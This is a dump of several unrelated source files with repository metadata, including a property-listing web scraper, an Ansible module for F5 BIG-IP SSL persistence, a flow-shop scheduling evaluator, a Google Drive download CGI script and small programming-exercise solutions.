2559fdc9545b2c7e337f5113b231025106dd22ab
|
refs/heads/CAallInOne_81X
| 2021-08-15T23:25:02.901905
| 2016-09-13T08:10:20
| 2016-09-13T08:53:42
| 176,462,898
| 0
| 1
|
Apache-2.0
| 2019-03-19T08:30:28
| 2019-03-19T08:30:24
| null |
UTF-8
|
Python
| false
| false
| 263
|
py
|
import FWCore.ParameterSet.Config as cms
from PhysicsTools.PatAlgos.recoLayer0.jetCorrFactors_cfi import *
from JetMETCorrections.Configuration.JetCorrectionServicesAllAlgos_cff import *
## for scheduled mode
patJetCorrections = cms.Sequence(patJetCorrFactors)
|
[
"giulio.eulisse@gmail.com"
] |
giulio.eulisse@gmail.com
|
7cf670a85f7dcf1fbf7f23cbce0cc5c89ae2b7dd
|
9d7be99cdac8b809f51c46a943ad5feb14548160
|
/listings2/data_scraper_listings2.py
|
909ab9862d01e75ef3f07bebd7a3a3c06de53360
|
[] |
no_license
|
CateGitau/DSI_trick_challenge
|
6c154b417a049ab0012edff0521d9e09387787f2
|
ddafac1f21425cb2992ce717ecbb0776703ea88e
|
refs/heads/master
| 2022-12-24T17:12:55.392276
| 2020-09-25T12:28:40
| 2020-09-25T12:28:40
| 297,908,859
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,659
|
py
|
import requests as rq
import bs4 as bs
import traceback
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.keys import Keys
import glob, os, time
import csv
from csv import writer
# # run the bellow file, if it gives an erro, it means you need to install chrome driver and put it in your path
# # this opens a chrome "site" based on the link below which we will scrape from
driver = webdriver.Chrome(executable_path="/home/cate/Downloads/chromedriver_linux64/chromedriver")
driver.get("https://www.property24.com/for-sale/cape-town/western-cape/432?PropertyCategory=House%2cApartmentOrFlat%2cTownhouse")
page_soup = bs.BeautifulSoup(driver.page_source,'lxml')
dict_data = {"location" :[], "price":[], "floor_size":[], "bathrooms":[], "bedrooms":[],"parking":[] }
icons = page_soup.find_all("span", class_= "p24_icons")
info = page_soup.find_all("div", class_= "p24_regularTile js_rollover_container")
def getValues(icons, info):
for values in info:
price = values.find('span', class_= 'p24_price')
if price:
price = price.text
else:
""
location = values.find('span', class_= "p24_location")
if location:
location = location.text
else:
""
dict_data["price"].append(price)
dict_data["location"].append(location)
#print(price)
for value in icons:
floor_size = value.find("span", class_= "p24_size")
if floor_size:
floor_size = floor_size.find("span").text
else:
""
bathrooms = value.find("span", {"title": "Bathrooms"})
if bathrooms:
bathrooms = bathrooms.find("span").text
else:
""
bedrooms = value.find("span", {"title": "Bedrooms"})
if bedrooms:
bedrooms = bedrooms.find("span").text
else:
""
parking = value.find("span", {"title": "Parking Spaces"})
if parking:
parking = parking.find("span").text
else:
""
dict_data["floor_size"].append(floor_size)
dict_data["bathrooms"].append(bathrooms)
dict_data["bedrooms"].append(bedrooms)
dict_data["parking"].append(parking)
return dict_data
def append_list_as_row(file_name, dict_data, field_names):
# Open file in append mode
with open(file_name, 'a+', newline='') as write_obj:
# Create a writer object from csv module
writer = csv.DictWriter(write_obj, fieldnames = field_names)
writer.writerow(dict_data)
csv_file = "final.csv"
count = 0
while True:
try:
driver.implicitly_wait(10)
page_soup = bs.BeautifulSoup(driver.page_source,'lxml')
icons = page_soup.find_all("span", class_= "p24_icons")
info = page_soup.find_all("div", class_= "p24_regularTile js_rollover_container")
dict_data = {"location" :[], "price":[], "floor_size":[], "bathrooms":[], "bedrooms":[],"parking":[] }
dict_data = getValues(icons, info)
field_names = dict_data.keys()
append_list_as_row('final.csv', dict_data, field_names)
count+= 1
print(f'{count}\r', end = "")
loadmore = driver.find_element_by_link_text("Next").click()
time.sleep(5)
#loadmore.send_keys(Keys.ENTER)
except Exception:
print("Reached bottom of page")
traceback.print_exc()
break
|
[
"catherinegitau94@gmail.com"
] |
catherinegitau94@gmail.com
|
6b2421764e5d39016f0e51d1a1ad0d4d9f0e6e10
|
e27333261b8e579564016c71d2061cc33972a8b8
|
/.history/ScrapeArticleTitle_20210803181904.py
|
01c3cfb222879a03f49b8531a28bb390ba6afeaa
|
[] |
no_license
|
Dustyik/NewsTweet_InformationRetrieval
|
882e63dd20bc9101cbf48afa6c3302febf1989b1
|
d9a6d92b51c288f5bcd21ea1cc54772910fa58f7
|
refs/heads/master
| 2023-07-01T09:12:53.215563
| 2021-08-12T08:28:33
| 2021-08-12T08:28:33
| 382,780,359
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,762
|
py
|
import pandas as pd
import json
import ast
import os
from nltk.tokenize import word_tokenize
from IPython.display import display
def get_article_titles_from_json():
filename = r"D:\Desktop\IR_term_8\sample-1M.jsonl" #file is too huge
with open(filename) as json_file:
data = json_file.readlines()
data = list(map(json.loads, data))
df = pd.DataFrame(data)
for col in df.columns:
print(col)
for col in df.columns:
print (col)
labels_to_drop = ["content", "media-type"]
df = df.drop(labels_to_drop, axis = 1)
count = len(df)
for idx, e in df.iterrows():
print("Row ",idx," out of ",count)
entry = e.values.tolist()
print (entry)
#for src in src_lst:
# print (src)
#output.to_csv(output_path, sep='\t', header=is_first, index=False, mode='a')
#is_first = False
#df.to_csv('article_titles.csv', index=False)
#Tokenising Funtions
def tokenize_stem_lower(text):
tokens = word_tokenize(text)
tokens = list(filter(lambda x: x.isalpha(), tokens))
tokens = [porter.stem(x.lower()) for x in tokens]
return ' '.join(tokens)
def get_clean_data(df):
df['clean_text'] = df.apply(lambda x: tokenize_stem_lower(x.tweet), axis=1)
return df
def check_if_article_itle_exist_in_tweets_csv(tweets_data, titles_data):
article_ids_in_tweets_csv = tweets_data['article_id'].tolist()
new_df = pd.DataFrame()
for index, row in titles_data.iterrows():
article_id = row.id
if article_id in article_ids_in_tweets_csv:
new_df = new_df.append(row)
display(new_df)
new_df.to_csv('article_title_new.csv', index=False)
return
get_article_titles_from_json()
|
[
"chiayik_tan@mymail.sutd.edu.sg"
] |
chiayik_tan@mymail.sutd.edu.sg
|
5a12bfa5ef76874a0470b4d9ee429a9145413096
|
3712a929d1124f514ea7af1ac0d4a1de03bb6773
|
/开班笔记/python网络编程及MySQL部分/day32/code/clock.py
|
23b6fa79cbd36db567930d651006699c63e168e4
|
[] |
no_license
|
jiyabing/learning
|
abd82aa3fd37310b4a98b11ea802c5b0e37b7ad9
|
6059006b0f86aee9a74cfc116d2284eb44173f41
|
refs/heads/master
| 2020-04-02T20:47:33.025331
| 2018-10-26T05:46:10
| 2018-10-26T05:46:10
| 154,779,387
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 522
|
py
|
from multiprocessing import Process
import time
class ClockProcess(Process):
def __init__(self,value):
self.value = value
#调用基类初始化方法
Process.__init__(self)
#super().__init__(self)
#在自定义的进程类中,重写父类的这个方法
def run(self):
n = 5
while n > 0:
print('The time is {}'.format(time.ctime()))
time.sleep(self.value)
n -= 1
#用自己的进程类创建进程
p = ClockProcess(2)
if __name__ == '__main__':
#自动执行run方法
p.start()
p.join()
|
[
"yabing_ji@163.com"
] |
yabing_ji@163.com
|
ca5c998f70de4c52660ed2f7cb58a11893b49e7d
|
2cc3aed1b5dfb91e3df165144d95c01a495bd54b
|
/581-Shortest-Unsorted-Continuous-Subarray-sort.py
|
30476a3fe00dd27aa9b3f815f4590fb84f2498fa
|
[] |
no_license
|
listenviolet/leetcode
|
f38e996148cb5d4be8f08286daac16243b3c30e4
|
0c1efcbfd35e5ef036ec1ccd0c014cd7baf2ed2b
|
refs/heads/master
| 2020-05-01T07:35:23.462429
| 2019-12-11T12:44:32
| 2019-12-11T12:44:32
| 177,354,773
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,722
|
py
|
class Solution:
def findUnsortedSubarray(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
copy = []
for i in range(len(nums)):
copy.append(nums[i])
copy.sort()
start = len(nums)
end = 0
for i in range(len(nums)):
if nums[i] != copy[i]:
start = min(start, i)
end = max(end, i)
return end - start + 1 if end - start >= 0 else 0
# Description:
# Given an integer array, you need to find one continuous subarray
# that if you only sort this subarray in ascending order,
# then the whole array will be sorted in ascending order, too.
# You need to find the shortest such subarray and output its length.
# Example 1:
# Input: [2, 6, 4, 8, 10, 9, 15]
# Output: 5
# Explanation: You need to sort [6, 4, 8, 10, 9] in ascending order
# to make the whole array sorted in ascending order.
# Note:
# Then length of the input array is in range [1, 10,000].
# The input array may contain duplicates,
# so ascending order here means <=.
# Solution:
# https://leetcode.com/problems/shortest-unsorted-continuous-subarray/solution/
# Approach #3 Using Sorting [Accepted]
# Algorithm
# We can sort a copy of the given array numsnums,
# say given by nums_sorted.
# Then, if we compare the elements of numsnums and nums_sorted,
# we can determine the leftmost and rightmost elements which mismatch.
# The subarray lying between them is,
# then, the required shorted unsorted subarray.
# Complexity Analysis
# Time complexity : O(nlogn). Sorting takes nlognnlogn time.
# Space complexity : O(n). We are making copy of original array.
# Beats: 26.94%
# Runtime: 120ms
# easy
|
[
"listenviolet@gmail.com"
] |
listenviolet@gmail.com
|
7a3938b589e748860c0fad0c8dd3a50430ef40b9
|
074afd26d00bb742b03c12891b057ab263e640bf
|
/codeforces/1451A.py
|
6eac98a8a0739915d4a2d7cff440dedefa842769
|
[] |
no_license
|
IsmailTitas1815/Data-Structure
|
7a898800b1e53c778b1f2f11b0df259e52c20140
|
fece8dd97d3e162e39fc31d5f3498a6dac49b0f0
|
refs/heads/master
| 2023-02-05T10:39:49.349484
| 2020-12-21T13:37:22
| 2020-12-21T13:37:22
| 296,343,627
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 268
|
py
|
for i in range(int(input())):
n = int(input())
if n<4:
if n==1:
print(0)
elif n==2:
print(1)
elif n==3:
print(2)
else:
if n%2==0:
print(2)
else:
print(3)
|
[
"titas.sarker1234@gmail.com"
] |
titas.sarker1234@gmail.com
|
056813a96995c2c95a58dbd3f2d02480808d3964
|
37c3c6fd1b05b6cf0c5f5ab89120562d7a8a40f8
|
/p36.py
|
86f55562115da41bd8012f1870549b9f265cbd58
|
[] |
no_license
|
kaviraj333/python
|
e4b480adfcbec383c1228e07426833b9c02f4296
|
7110b6e153c4ef4afe7ade8ce20104b26ea4cc8f
|
refs/heads/master
| 2020-05-22T23:17:48.540550
| 2019-04-09T05:04:31
| 2019-04-09T05:04:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 201
|
py
|
amu=int(raw_input())
arr=list(map(int,raw_input().split()))
r=[]
for i in arr:
r.append(i)
b=sum(r)
if(sum(r)==22):
print("4")
elif(r[1]==3):
print("0")
else:
m=min(r)
print(m)
|
[
"noreply@github.com"
] |
kaviraj333.noreply@github.com
|
e61ee9fe6455a99ff23ec3f7d31d68c0f3408062
|
1dd4ae2d974d65e86538e49f84179b3ec6b8476c
|
/build/robotiq/robotiq_modbus_tcp/catkin_generated/pkg.develspace.context.pc.py
|
c68a3cb9bf4efb70df639a4b81765748f3b0d9b8
|
[] |
no_license
|
tony23545/bulldog_ws
|
e115510d87980c90b308ae881c59d4e6145964c0
|
d3e03aa230e9366023df383665cf6be928d68c8d
|
refs/heads/master
| 2022-11-30T06:21:04.073397
| 2019-07-08T07:33:52
| 2019-07-08T07:33:52
| 176,073,396
| 5
| 0
| null | 2022-11-21T21:13:17
| 2019-03-17T08:11:32
|
Makefile
|
UTF-8
|
Python
| false
| false
| 389
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "rospy".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "robotiq_modbus_tcp"
PROJECT_SPACE_DIR = "/home/shengjian/bulldog_ws/devel"
PROJECT_VERSION = "1.0.0"
|
[
"csj15thu@gmail.com"
] |
csj15thu@gmail.com
|
74f18e356d9fe201db24ff1b68518f244b65d841
|
c85a6d674679780ee510b5c8c3dbcbdecc859f64
|
/test/test_group.py
|
712c217d06209ae2dd8bfe1aca97dc90f5576fcd
|
[] |
no_license
|
cbrowet-axway/APIM_sdk
|
d4f4a124e86a7b2e65d0ef07b54c68e95de68337
|
4f82df67ebe3dd6eae645bab8f86e72c0347ee24
|
refs/heads/master
| 2020-05-25T13:22:35.802350
| 2020-04-16T09:25:21
| 2020-04-16T09:25:21
| 187,820,389
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 894
|
py
|
# coding: utf-8
"""
API Manager API v1.3
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 1.3.0
Contact: support@axway.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.models.group import Group # noqa: E501
from swagger_client.rest import ApiException
class TestGroup(unittest.TestCase):
"""Group unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testGroup(self):
"""Test Group"""
# FIXME: construct object with mandatory attributes with example values
# model = swagger_client.models.group.Group() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"cbro@semperpax.com"
] |
cbro@semperpax.com
|
4acd426428bf36b3e05b49f55188a9d1fb157d9d
|
eccda8bebcf343c6c2742980a604905135485b69
|
/library/f5bigip_ltm_persistence_ssl.py
|
f4700fcb09e98962ecc1758d5f6d19e2c719c089
|
[
"Apache-2.0"
] |
permissive
|
erjac77/ansible-module-f5bigip
|
5c920dc239098d6d3a8311da3ccb9562428a8362
|
96af6d5dc77d8ccbe18cb4fdc916625756e5f9dd
|
refs/heads/master
| 2021-01-11T08:33:52.304903
| 2020-02-14T21:42:09
| 2020-02-14T21:42:09
| 76,477,286
| 6
| 5
|
Apache-2.0
| 2018-08-09T20:41:31
| 2016-12-14T16:30:04
|
Python
|
UTF-8
|
Python
| false
| false
| 5,650
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2016-2018, Eric Jacob <erjac77@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: f5bigip_ltm_persistence_ssl
short_description: BIG-IP ltm persistence ssl module
description:
- Configures a Secure Socket Layer (SSL) persistence profile.
version_added: "2.4"
author:
- "Eric Jacob (@erjac77)"
options:
app_service:
description:
- Specifies the application service to which the object belongs.
defaults_from:
description:
- Specifies the existing profile from which the system imports settings for the new profile.
default: ssl
description:
description:
- Specifies descriptive text that identifies the component.
match_across_pools:
description:
- Specifies, when enabled, that the system can use any pool that contains this persistence record.
default: disabled
choices: ['enabled', 'disabled']
match_across_services:
description:
- Specifies, when enabled, that all persistent connections from a client IP address, which go to the same
virtual IP address, also go to the same node.
default: disabled
choices: ['enabled', 'disabled']
match_across_virtuals:
description:
- Specifies, when enabled, that all persistent connections from the same client IP address go to the same
node.
default: disabled
choices: ['enabled', 'disabled']
mirror:
description:
- Specifies whether the system mirrors persistence records to the high-availability peer.
default: disabled
choices: ['enabled', 'disabled']
name:
description:
- Specifies a unique name for the component.
required: true
override_connection_limit:
description:
- Specifies, when enabled, that the pool member connection limits are not enforced for persisted clients.
default: disabled
choices: ['enabled', 'disabled']
partition:
description:
- Specifies the administrative partition in which the component object resides.
default: Common
state:
description:
- Specifies the state of the component on the BIG-IP system.
default: present
choices: ['absent', 'present']
timeout:
description:
- Specifies the duration of the persistence entries.
default: 300
requirements:
- BIG-IP >= 12.0
- ansible-common-f5
- f5-sdk
'''
EXAMPLES = '''
- name: Create LTM SSL Persistence profile
f5bigip_ltm_persistence_cookie:
f5_hostname: 172.16.227.35
f5_username: admin
f5_password: admin
f5_port: 443
name: my_ssl_persistence
partition: Common
description: My ssl persistence profile
defaults_from: /Common/ssl
state: present
delegate_to: localhost
'''
RETURN = ''' # '''
from ansible.module_utils.basic import AnsibleModule
from ansible_common_f5.base import F5_ACTIVATION_CHOICES
from ansible_common_f5.base import F5_NAMED_OBJ_ARGS
from ansible_common_f5.base import F5_PROVIDER_ARGS
from ansible_common_f5.bigip import F5BigIpNamedObject
class ModuleParams(object):
@property
def argument_spec(self):
argument_spec = dict(
app_service=dict(type='str'),
defaults_from=dict(type='str'),
description=dict(type='str'),
match_across_pools=dict(type='str', choices=F5_ACTIVATION_CHOICES),
match_across_services=dict(type='str', choices=F5_ACTIVATION_CHOICES),
match_across_virtuals=dict(type='str', choices=F5_ACTIVATION_CHOICES),
mirror=dict(type='str', choices=F5_ACTIVATION_CHOICES),
override_connection_limit=dict(type='str', choices=F5_ACTIVATION_CHOICES),
timeout=dict(type='int')
)
argument_spec.update(F5_PROVIDER_ARGS)
argument_spec.update(F5_NAMED_OBJ_ARGS)
return argument_spec
@property
def supports_check_mode(self):
return True
class F5BigIpLtmPersistenceSsl(F5BigIpNamedObject):
def _set_crud_methods(self):
self._methods = {
'create': self._api.tm.ltm.persistence.ssls.ssl.create,
'read': self._api.tm.ltm.persistence.ssls.ssl.load,
'update': self._api.tm.ltm.persistence.ssls.ssl.update,
'delete': self._api.tm.ltm.persistence.ssls.ssl.delete,
'exists': self._api.tm.ltm.persistence.ssls.ssl.exists
}
def main():
params = ModuleParams()
module = AnsibleModule(argument_spec=params.argument_spec, supports_check_mode=params.supports_check_mode)
try:
obj = F5BigIpLtmPersistenceSsl(check_mode=module.check_mode, **module.params)
result = obj.flush()
module.exit_json(**result)
except Exception as exc:
module.fail_json(msg=str(exc))
if __name__ == '__main__':
main()
|
[
"erjac77@gmail.com"
] |
erjac77@gmail.com
|
fd9fed8d50f3bc3779e3425c4fcf511a9684675a
|
bd37ff289bcbe24cc6e8ab360569713b9109265d
|
/logistic_regression1.py
|
0e62f1edd37807715a19d1310c273bd42e8e156f
|
[] |
no_license
|
Sanil2108/python-machine-learning
|
fc035f6ddd586cf3dab9421002d4408c03b0589c
|
c9dbf8a1f34aa3b80c76986c742e85a9be4b2375
|
refs/heads/master
| 2021-01-11T09:00:28.995823
| 2017-06-18T06:08:33
| 2017-06-18T06:08:33
| 77,436,496
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,948
|
py
|
import numpy as np
import matplotlib.pyplot as plt
all_cost=[]
def logistic(z):
return 1/(1+np.exp(-z))
def hypothesis(theta, X):
return logistic(np.array(np.matrix(X)*np.transpose(np.matrix(theta))))[0][0]
# return getY(theta, X)
def cost(theta, X, y):
m=len(y)
total=0
for i in range(m):
total+=(y[i]*np.log(hypothesis(theta, X[i])) + (1-y[i])*np.log(1-hypothesis(theta, X[i])))
return -total/m
def gradient_descent(X, y, alpha):
tempCost=1000
while(tempCost>0.01):
for j in range(len(theta)):
pd=0
for i in range(len(y)):
pd+=(hypothesis(theta, X[i])-y[i])*X[i][j]
theta[j]=theta[j]-alpha*pd
all_cost.append(tempCost)
if(tempCost-cost(theta, X, y)<1e-50):
break
tempCost=cost(theta, X, y)
print(tempCost)
print(theta)
# temp_x = np.linspace(0, len(all_cost), len(all_cost) + 1)
# for i in range(len(all_cost)):
# plt.plot(temp_x[i], all_cost[i], 'ro')
# plt.show()
return theta
#X is an (n+1) row vector
def getY(theta, X):
if(np.array(np.matrix(X)*np.transpose(np.matrix(theta)))>=0.5):
return 1
else:
return 0
# new dataset for a circular decision boundary
X = [
[1, 0, 0, 0, 0, 0],
[1, 0.5, 0.25, -0.5, 0.25, -0.25],
[1, 0.5, 0.25, 0.5, 0.25, 0.25],
[1, - 0.5, 0.25, -0.5, 0.25, 0.25],
[1, -0.5, 0.25, 0.5, 0.25, -0.25],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, -1, 1, -1],
[1, -1, 1, 1, 1, -1],
[1, -1, 1, -1, 1, 1],
[1, 0, 0, 1, 1, 0],
[1, 0, 0, -1, 1, 0],
[1, 1, 1, 0, 0, 0],
[1, -1, 1, 0, 0, 0]
]
y = [
0,
0,
0,
0,
0,
1,
1,
1,
1,
1,
1,
1,
1
]
theta = [
0,
0,
0,
0,
0,
0
]
alpha = 0.05
gradient_descent(X, y, alpha)
|
[
"sanilkhurana7@gmail.com"
] |
sanilkhurana7@gmail.com
|
b81f580bfd884ff1bbcd428a82ed1131ae1d6e8d
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_75/717.py
|
36146101c64393b9b35cbf7d17c8eadde15d28f0
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,286
|
py
|
def solvecase(L):
C = int(L[0])
D = int(L[C+1])
N = int(L[C+D+2])
F = L[1:C+1]
X = L[C+2:C+D+2]
S = L[-1]
Q = []
for s in S:
#get spell from list
Q.append(s)
#send recent spells to check combination
if len(Q) > 1:
comb = chkcombine(F,Q[-1],Q[-2])
if comb!=None:
Q.pop()
Q.pop()
Q.append(comb)
#check for opposing spells
for i in range(len(Q)-1):
if chkoppose(X,Q[i],Q[-1]):
#destroy everything
Q = []
break
return Q
def chkcombine(formulalist,s1,s2):
for formula in formulalist:
if (formula[0]==s1 and formula[1]==s2) or (formula[1]==s1 and formula[0]==s2):
return formula[2]
return None
def chkoppose(opposelist,s1,s2):
for oppose in opposelist:
if (oppose[0]==s1 and oppose[1]==s2) or (oppose[1]==s1 and oppose[0]==s2):
return True
return False
N = int(input())
for n in range(N):
r = solvecase(input().split(' '))
print("Case #",str(n+1),": [",sep='',end='')
print(", ".join(r),sep='',end='')
print(']')
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
97f962ce6c17f6babfe9ca499eb8d54b7c02b803
|
ba1066b0860a73020eb5c4ee0021f68e3639327c
|
/Sujet 1/evaluation.py
|
2a1b30bdb920408611258d3a5c7a66af323e27fe
|
[] |
no_license
|
Hiestaa/TARP-ODNL
|
cf51678ce4940d2d84a167317eb70298863cc9b1
|
3a09054558ddc188f80abfd13ea51e1e99d64d68
|
refs/heads/master
| 2021-01-25T07:27:54.313545
| 2014-01-13T01:14:33
| 2014-01-13T01:14:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,300
|
py
|
from machine import Machine
from task import Task
import Log
import time
import os.path
class Evaluation:
def __init__(self, tasks, sequence, id):
self.tasks = []
for ti in sequence:
self.tasks.append(tasks[ti])
self.nbtasks = len(self.tasks)
self.taskcomplete = 0
self.machinelist = None
self.time = 0
self.log = None
#self.log = Log.Log('log/last.log.html')
self.id = id
def fast(self) :
tab = []
for t in self.tasks:
copytask = []
for op in t.oplist:
copytask.append(op)
tab.append(copytask)
nbLines = len(tab[0])
nbColonnes = len(tab)
i = 1
while i < nbLines :
tab[0][i] = tab[0][i - 1] + tab[0][i]
i += 1
j = 1
while j < nbColonnes :
tab[j][0] = tab[j - 1][0] + tab[j][0]
i = 1
while i < nbLines :
if tab[j - 1][i] > tab[j][i - 1] :
tmp = tab[j - 1][i]
else :
tmp = tab[j][i - 1]
tab[j][i] = tab[j][i] + tmp
i += 1
j += 1
return tab[nbColonnes - 1][nbLines - 1]
# c = np.zeros((n + 1, m + 1))
# for i in range(1, n + 1):
# for j in range(1, m + 1):
# c[i, j] = max(c[i - 1, j], c[i, j - 1]) + tasks[order[i - 1], j - 1]
# return c[n, m]
def ontaskdone(self, task):
self.taskcomplete += 1
self.log.log_event_success(self.time, 'TaskEvent',"A task has been finished: " +str(task.id))
def onopdone(self):
self.log.log_event(self.time, 'TaskEvent', "An operation has been finished on first machine !")
if len(self.tasks):
task = self.tasks.pop(0)
task.reinit()
self.machinelist.assignTask(task, self.onopdone, self.ontaskdone)
def findUniqueName(self, name):
lst = name.split('-')
for x in range(len(lst)):
if x is not 0:
test = reduce(lambda a, b: a + '-' + b,lst[:x])
if not os.path.isfile('log/' + test + '.log.html'):
return 'log/' + test + '.log.html'
return 'log/' + name + '.log.html'
def simulation(self):
self.log = Log.Log(self.findUniqueName(self.id))
self.log.log_init_tasklist(self.tasks)
self.log.log_event_info(self.time, 'Execution', "Execution started !")
task = self.tasks.pop(0)
task.reinit()
k = 0
for op in task.oplist:
m = Machine(k, self.log)
k += 1
if not self.machinelist:
self.machinelist = m
else:
tmp = self.machinelist
while tmp.next:
tmp = tmp.next
tmp.next = m
self.log.log_event(self.time, 'Execution', str(self.machinelist.getNbMachines()) + " machines added to process operations.")
self.machinelist.assignTask(task, self.onopdone, self.ontaskdone)
while self.taskcomplete is not self.nbtasks:
#print self.time,
self.time += 1
self.machinelist.update(self.time)
self.log.log_event_success(self.time, 'Execution', "All tasks done, execution successfully done !")
self.log.log_init_machines()
m = self.machinelist
while m:
self.log.log_machine_state(m.id, m.total_working_time, m.total_waiting_time, m.work_history)
m = m.next
self.log.log_close()
return self.time
if __name__ == '__main__':
tasks = [
Task(1, [10, 40, 30]),
Task(2, [20, 50, 10]),
Task(3, [1, 5, 10]),
Task(4, [5, 20, 10]),
Task(5, [10, 15, 5])
]
seq = [4, 3, 1, 2, 0]
t = time.time()
itern = Evaluation(tasks, seq).run()
print ""
print "Evaluation time: ", time.time() - t, "s"
print "Evaluation result: ", itern, 'iterations'
|
[
"rom1guyot@gmail.com"
] |
rom1guyot@gmail.com
|
966d74d56d048ce98e54842ab9549589742118e9
|
2a839c9f5ad608cbc6cbb7d03a8af482dcbd2956
|
/cgi-bin/download.py
|
49a2220a84d8090abe8d27c4ea01117f334c80cc
|
[] |
no_license
|
scraperdragon/google-docs
|
0a3653a10a8f4db6c419745e87c45564706405f8
|
56a6955bfbfa1acc56732356f9d828690985fce3
|
refs/heads/master
| 2021-01-19T15:32:38.868177
| 2015-04-17T10:55:17
| 2015-04-17T10:55:17
| 22,986,877
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,379
|
py
|
#!/usr/bin/python
import sys
import os
import requests
import json
import urlparse
def request_with_key(url):
return requests.get(url, headers={'Authorization': 'Bearer {key}'.format(key=key)})
def output(msg):
print json.dumps(msg)
exit(0)
DRIVE_FILES_URL = "https://www.googleapis.com/drive/v2/files/{id}"
DOCUMENT_EXPORT_URL = "https://docs.google.com/feeds/download/documents/export/Export?id={id}&exportFormat={format}"
print "Content-type: application/json\n\n";
# acquire environment
if len(sys.argv) == 4:
doc_id, key, filename = sys.argv[1:]
else:
params = urlparse.parse_qs(os.environ.get("QUERY_STRING"))
doc_id, = params.get('id')
key, = params.get('key')
filename, = params.get('filename')
if not(doc_id):
output({"error": "no id"})
if not(key):
output({"error": "no key"})
if not(filename):
output({"error": "no filename"})
r = request_with_key(DRIVE_FILES_URL.format(id=doc_id))
try:
j = r.json()
except Exception:
output({"error": "response wasn't json", "error_detail":r.content, "params": params})
if 'downloadUrl' in j:
xlsx_url = j['downloadUrl']
else:
xlsx_url = j['exportLinks']['application/vnd.openxmlformats-officedocument.spreadsheetml.sheet']
xlsx_content = request_with_key(xlsx_url).content
with open(filename, 'w') as f:
f.write(xlsx_content)
output({"filename": filename})
|
[
"dragon@scraperwiki.com"
] |
dragon@scraperwiki.com
|
d0ec0a41b10c508f07c1ac2e6b2c38ba42f77c1e
|
6e58f95a931db523a3957134ff8cac670d4c20be
|
/Hunter level/given 2 string checking whether they are same without using built in function.py
|
0b85adde15d8c4f9f377c2739745e69844479191
|
[] |
no_license
|
ramyasutraye/python-programming-13
|
36235f324152d793ca1b2bf087d2a49a62d47787
|
ea58462208bb4da826b9f1917bdad17c80d055dc
|
refs/heads/master
| 2020-04-23T19:30:53.189933
| 2018-05-02T17:13:30
| 2018-05-02T17:13:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 232
|
py
|
a=str(input())
b=str(input())
l1=len(a)
l2=len(b)
if(l1==l2):
for i in range (l1):
if a[i]==b[i]:
flag=1
else:
flag=0
if (flag==1):
print ("yes")
else:
print ("no")
else:
print ("no")
|
[
"noreply@github.com"
] |
ramyasutraye.noreply@github.com
|
9cd8a6e55a4e5085df6657d0a04781d0dee9ed7b
|
b5a9d42f7ea5e26cd82b3be2b26c324d5da79ba1
|
/tensorflow/python/training/saver_large_variable_test.py
|
f19600a79e7b85bc841cc500c0681bd62a3cd3a6
|
[
"Apache-2.0"
] |
permissive
|
uve/tensorflow
|
e48cb29f39ed24ee27e81afd1687960682e1fbef
|
e08079463bf43e5963acc41da1f57e95603f8080
|
refs/heads/master
| 2020-11-29T11:30:40.391232
| 2020-01-11T13:43:10
| 2020-01-11T13:43:10
| 230,088,347
| 0
| 0
|
Apache-2.0
| 2019-12-25T10:49:15
| 2019-12-25T10:49:14
| null |
UTF-8
|
Python
| false
| false
| 2,386
|
py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
